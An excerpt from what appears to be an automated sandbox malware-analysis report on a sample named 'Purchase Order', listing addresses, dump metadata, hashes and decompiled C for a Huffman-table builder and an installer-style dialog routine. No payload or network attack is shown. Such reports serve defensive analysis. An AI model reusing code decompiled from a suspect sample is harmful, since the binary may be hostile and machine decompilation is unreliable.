0x00407243
0x00407245
0x00407248
0x0040724b
0x0040724b
0x0040724b
0x00407252
0x0040725a
0x0040725d
0x00407260
0x00407262
0x00407265
0x00407265
0x00407267
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407270
0x00407275
0x00407277
0x0040727d
0x0040727f
0x00407294
0x00407296
0x00407296
0x00407281
0x00407287
0x00407289
0x0040728b
0x0040728b
0x00407298
0x0040729c
0x0040729f
0x004072a5
0x004072a5
0x004072a8
0x004072a8
0x004072a8
0x004072aa
0x00000000
0x00000000
0x004072b0
0x004072b0
0x004072b6
0x004072b8
0x004072dd
0x004072e0
0x004072e6
0x004072eb
0x004072f1
0x004072f7
0x004072f9
0x004072fc
0x00407305
0x0040730b
0x0040730b
0x004072fe
0x00407300
0x00407302
0x00407302
0x0040730d
0x00407313
0x00407315
0x00407318
0x0040731a
0x00407320
0x00407322
0x00407324
0x00407326
0x00407328
0x0040732b
0x00407334
0x00407337
0x00407337
0x0040732d
0x0040732d
0x00407330
0x00407330
0x0040732b
0x00407322
0x00407339
0x0040733b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040733b
0x004072ba
0x004072ba
0x004072c0
0x004072c6
0x004072c8
0x00000000
0x00000000
0x004072ca
0x004072ca
0x004072cc
0x004072ce
0x004072d7
0x004072d7
0x004072d0
0x004072d0
0x004072d3
0x004072d3
0x004072d9
0x004072db
0x00000000
0x00000000
0x00407341
0x00407341
0x00407346
0x00407348
0x00407349
0x0040734a
0x0040734b
0x00407351
0x00407354
0x00407357
0x0040735a
0x0040735c
0x00407362
0x00407362
0x00407365
0x00407365
0x00407365
0x00407365
0x0040736e
0x00000000
0x00000000
0x00407373
0x00407373
0x00407376
0x00407379
0x0040737b
0x00407412
0x00407412
0x00407415
0x00407417
0x00407418
0x00407419
0x0040741c
0x00000000
0x0040741c
0x00407381
0x00407381
0x00407387
0x00407389
0x004073ae
0x004073b1
0x004073b7
0x004073bc
0x004073c2
0x004073c8
0x004073ca
0x004073cd
0x004073d6
0x004073dc
0x004073dc
0x004073cf
0x004073d1
0x004073d3
0x004073d3
0x004073de
0x004073e4
0x004073e6
0x004073e9
0x004073eb
0x004073f1
0x004073f3
0x004073f5
0x004073f7
0x004073f9
0x004073fc
0x00407405
0x00407408
0x00407408
0x004073fe
0x004073fe
0x00407401
0x00407401
0x004073fc
0x004073f3
0x0040740a
0x0040740c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040740c
0x0040738b
0x0040738b
0x00407391
0x00407397
0x00407399
0x00000000
0x00000000
0x0040739b
0x0040739b
0x0040739d
0x0040739f
0x004073a6
0x004073a6
0x004073a8
0x004073a1
0x004073a1
0x004073a3
0x004073a3
0x004073aa
0x004073ac
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407424
0x00407424
0x00407427
0x00407429
0x0040742c
0x0040742f
0x0040742f
0x0040742f
0x0040742f
0x00000000
0x00000000
0x00000000
0x00406add
0x00406ac1
0x00000000
0x00406ac7
0x00406aca
0x00406ad4
0x00406ad7
0x00406ada
0x00000000
0x00406ada
0x00406ac1
0x00406ae5
0x00406ae8
0x00406aec
0x00406af6
0x00406b00
0x00406b03
0x00406b09
0x00406c3d
0x00406c3f
0x00406c45
0x00406c48
0x00406c4b
0x00000000
0x00406c4b
0x00406b0f
0x00406b0f
0x00406b10
0x00406b68
0x00406b68
0x00406b6f
0x00406c15
0x00406c15
0x00406c1a
0x00406c1d
0x00406c22
0x00406c25
0x00406c2a
0x00406c2d
0x00406c32
0x00406c35
0x00406c35
0x00000000
0x00406b75
0x00406b75
0x00406b75
0x00406b75
0x00406b79
0x00406b79
0x00406b9b
0x00406b9e
0x00406ba0
0x00406ba3
0x00406ba8
0x00406b7e
0x00406b7e
0x00406b83
0x00406b85
0x00406b87
0x00406b8c
0x00406b92
0x00406b97
0x00406b99
0x00406b99
0x00406b8e
0x00406b8e
0x00406b8e
0x00406b8c
0x00000000
0x00406baa
0x00406bd7
0x00406bdc
0x00406bde
0x00406bdf
0x00406be1
0x00406be2
0x00406be2
0x00406be2
0x00406c0a
0x00406c0f
0x00406c0f
0x00000000
0x00406c0f
0x00406ba8
0x00406b6f
0x00406b12
0x00406b12
0x00406b13
0x00406b5d
0x00000000
0x00406b5d
0x00406b15
0x00406b16
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c72
0x00406c72
0x00406c72
0x00406c75
0x00000000
0x00000000
0x00406c52
0x00406c52
0x00406c56
0x00000000
0x00000000
0x00406c5c
0x00406c5c
0x00406c5f
0x00406c62
0x00406c67
0x00406c69
0x00406c6c
0x00406c6f
0x00406c6f
0x00406c6f
0x00406c77
0x00406c77
0x00406c7a
0x00406c7c
0x00406c81
0x00406c84
0x00406c86
0x00406c89
0x00000000
0x00000000
0x00406c8f
0x00406c8f
0x00406c91
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00000000
0x00000000
0x00406ca1
0x00406ca1
0x00406ca4
0x00406ca6
0x00406d44
0x00406d44
0x00406d47
0x00406d49
0x00406d49
0x00406d4c
0x00406d4f
0x00406d51
0x00406d53
0x00406d55
0x00406d55
0x00406d5e
0x00406d63
0x00406d66
0x00406d69
0x00406d6c
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d78
0x00406d78
0x00406d7e
0x00406d7e
0x00406d7e
0x00000000
0x00406d72
0x00406cac
0x00406cac
0x00406cb2
0x00406cb5
0x00406cb7
0x00406ce2
0x00406ce5
0x00406ceb
0x00406cf0
0x00406cf6
0x00406cfc
0x00406cfe
0x00406d01
0x00406d0a
0x00406d10
0x00406d10
0x00406d03
0x00406d05
0x00406d07
0x00406d07
0x00406d12
0x00406d18
0x00406d1b
0x00406d1d
0x00406d1f
0x00406d25
0x00406d27
0x00406d29
0x00406d2c
0x00406d35
0x00406d35
0x00406d37
0x00406d2e
0x00406d2e
0x00406d31
0x00406d31
0x00406d39
0x00406d39
0x00406d27
0x00406d3c
0x00406d3e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d3e
0x00406cb9
0x00406cb9
0x00406cbf
0x00406cc5
0x00406cc7
0x00000000
0x00000000
0x00406cc9
0x00406cc9
0x00406ccb
0x00406ccd
0x00406cd0
0x00406cd7
0x00406cd7
0x00406cd9
0x00406cd2
0x00406cd2
0x00406cd4
0x00406cd4
0x00406cdb
0x00406cdd
0x00406ce0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406de4
0x00406de7
0x00406dea
0x00406df0
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fc7
0x00406fc7
0x00406fc7
0x00406fca
0x00406fcd
0x00406fcf
0x00406fd2
0x00406fd8
0x00406fdf
0x00406fe1
0x00000000
0x00000000
0x00406eb5
0x00406eb5
0x00406edd
0x00406edd
0x00406edd
0x00406edf
0x00000000
0x00000000
0x00406ebd
0x00406ebd
0x00406ec1
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406eca
0x00406ecd
0x00406ed0
0x00406ed2
0x00406ed4
0x00406ed7
0x00406eda
0x00406eda
0x00406eda
0x00406ee1
0x00406ee1
0x00406ee9
0x00406eec
0x00406ef2
0x00406ef5
0x00406ef9
0x00406efd
0x00406f00
0x00406f03
0x00406f1b
0x00406f1b
0x00406f1e
0x00406f2c
0x00406f2f
0x00406f20
0x00406f20
0x00406f22
0x00406f29
0x00406f29
0x00406f58
0x00406f58
0x00406f58
0x00406f5b
0x00406f5d
0x00000000
0x00000000
0x00406f38
0x00406f38
0x00406f3c
0x00000000
0x00000000
0x00406f42
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4d
0x00406f4f
0x00406f52
0x00406f55
0x00406f55
0x00406f55
0x00406f5f
0x00406f5f
0x00406f61
0x00406f63
0x00406f6e
0x00406f71
0x00406f74
0x00406f76
0x00406f78
0x00406f7a
0x00406f7d
0x00406f80
0x00406f85
0x00406f88
0x00406f8b
0x00406f8e
0x00406f95
0x00406f98
0x00406f9a
0x00000000
0x00000000
0x00406fa0
0x00406fa0
0x00406fa4
0x00406fb5
0x00406fb5
0x00406fb5
0x00406fb7
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fbb
0x00406fbd
0x00406fbe
0x00406fc1
0x00406fc1
0x00406fc1
0x00406fc4
0x00000000
0x00406fc4
0x00406fa6
0x00406fa6
0x00406fa9
0x00000000
0x00000000
0x00406faf
0x00406faf
0x00000000
0x00406faf
0x00406f05
0x00406f05
0x00406f07
0x00406f09
0x00406f0c
0x00406f0f
0x00406f13
0x00406f13
0x00406fe7
0x00406fe7
0x00406fea
0x00406ff1
0x00406ff5
0x00406ff7
0x00406ffa
0x00406ffd
0x00407002
0x00407005
0x00407007
0x00407008
0x0040700b
0x00407016
0x00407019
0x00407030
0x00407035
0x0040703c
0x00407041
0x00407045
0x00407047
0x00407047
0x00407047
0x0040704a
0x0040704c
0x00000000
0x00407052
0x00407052
0x00407056
0x00407061
0x00407074
0x00407079
0x0040707e
0x00407080
0x00000000
0x00000000
0x00407086
0x00407086
0x00407089
0x0040708b
0x00407099
0x00407099
0x0040709c
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x00000000
0x004070ae
0x0040708d
0x0040708d
0x00407093
0x00000000
0x00000000
0x00000000
0x00407093
0x00000000
0x00000000
0x00000000
0x00407432
0x00407432
0x00407438
0x0040743e
0x00407443
0x00407449
0x0040744f
0x00407451
0x00407454
0x0040745d
0x00407463
0x00407463
0x00407456
0x00407458
0x0040745a
0x0040745a
0x00407465
0x00407467
0x0040746a
0x004074a5
0x004074a5
0x00000000
0x0040746c
0x0040746c
0x0040746c
0x00407472
0x00407475
0x00407477
0x004074ac
0x004074ae
0x00000000
0x004074ae
0x00000000
0x00407477
0x00000000
0x00406ab6
0x00407484
0x00000000
0x00407484
0x00406e98
0x00406e9a
0x00000000
0x00000000
0x00406e9c
0x00406e9c
0x00406e9f
0x00000000
0x00406e9f
0x00406de4
0x00406da5
0x00407489
0x0040748c
0x0040748e
0x00407497
0x0040749d
0x00000000

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040755C Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x432190;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x432190 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x00407567
0x0040756f
0x00407573
0x00407575
0x00407578
0x0040757a
0x0040757a
0x0040757c
0x00407583
0x00407585
0x00407585
0x0040758b
0x004075a0
0x004075a8
0x004075aa
0x004075ac
0x004075af
0x004075b0
0x004075b0
0x004075b6
0x00000000
0x00000000
0x004075b8
0x004075bb
0x00000000
0x00000000
0x00000000
0x004075bb
0x004075bf
0x004075c2
0x004075c4
0x004075c4
0x004075c7
0x004075cd
0x004075ce
0x00000000
0x00000000
0x00000000
0x004075ce
0x004075d3
0x004075d6
0x004075d8
0x004075d8
0x004075de
0x004075e0
0x004075f1
0x004075e4
0x004075e8
0x0040788d
0x00000000
0x0040788d
0x004075ee
0x004075ef
0x004075ef
0x004075f7
0x004075fa
0x004075fe
0x00407600
0x00407602
0x00407605
0x00000000
0x00000000
0x0040760d
0x00407613
0x00407615
0x00407617
0x00407618
0x0040762d
0x0040762d
0x00407630
0x00407632
0x00407632
0x00407634
0x00407639
0x0040763b
0x00407642
0x00407644
0x0040764c
0x0040764c
0x0040764e
0x0040764f
0x0040765e
0x00407662
0x00407666
0x00407669
0x0040766c
0x00407671
0x00407674
0x0040767a
0x00407681
0x00407687
0x00407880
0x00407880
0x00407885
0x00407894
0x00000000
0x00000000
0x00000000
0x00407885
0x00407694
0x00407697
0x0040769a
0x0040769d
0x004076a1
0x00000000
0x00000000
0x004076ac
0x004076af
0x004076b0
0x004076b2
0x004076b8
0x004076bb
0x00000000
0x00000000
0x004076c1
0x004076c2
0x004076c5
0x004076c8
0x004076cb
0x004076d1
0x004076d3
0x004076d3
0x004076db
0x004076df
0x004076e4
0x00407709
0x0040770f
0x00407711
0x00407713
0x00407716
0x0040771f
0x00000000
0x00000000
0x004076e6
0x004076e6
0x004076ef
0x004076f3
0x00000000
0x00000000
0x00407704
0x00407704
0x00407707
0x00000000
0x00000000
0x004076f7
0x004076fa
0x004076fc
0x00407700
0x00000000
0x00000000
0x00407702
0x00407702
0x00000000
0x00407704
0x00407728
0x0040772e
0x00407738
0x0040773a
0x0040773f
0x00407741
0x00407777
0x00407743
0x00407743
0x00407746
0x00407749
0x00407753
0x00407756
0x0040775d
0x00407768
0x0040776f
0x0040776f
0x00407779
0x0040777c
0x0040777e
0x00407784
0x00407784
0x0040778d
0x00407790
0x00407795
0x004077a4
0x004077ac
0x004077b1
0x004077d5
0x004077dd
0x004077e1
0x004077e7
0x004077b3
0x004077c1
0x004077c4
0x004077ca
0x004077ca
0x004077eb
0x004077a6
0x004077a6
0x004077a6
0x004077fc
0x00407800
0x0040780c
0x00407807
0x0040780a
0x0040780a
0x00407814
0x00407819
0x00407821
0x0040781d
0x0040781f
0x0040781f
0x00407827
0x00407829
0x00407830
0x0040783a
0x00407844
0x00407860
0x00407864
0x004076a9
0x004076af
0x004076b0
0x004076b2
0x004076b8
0x004076bb
0x00000000
0x00000000
0x00000000
0x004076bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00407846
0x00407846
0x00407846
0x0040784b
0x00407854
0x0040785d
0x00000000
0x0040785d
0x0040786a
0x0040786a
0x0040786d
0x00407874
0x00407877
0x00000000
0x0040769a
0x0040761a
0x0040761c
0x0040761c
0x00407620
0x00407623
0x00407624
0x00407624
0x00000000
0x0040761c
0x00407590
0x00407596
0x00000000

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404F06 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x434f28;
				_v28 =  *0x434f10 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x434f19 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E54(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42d24c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x42d260;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42d24c = 0;
								 *0x42d260 = 0;
								 *0x434f60 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404ED4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x42d260;
									_t201 =  *0x434f28;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x434f2c <= 0) {
										L86:
										if( *0x434fbe == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
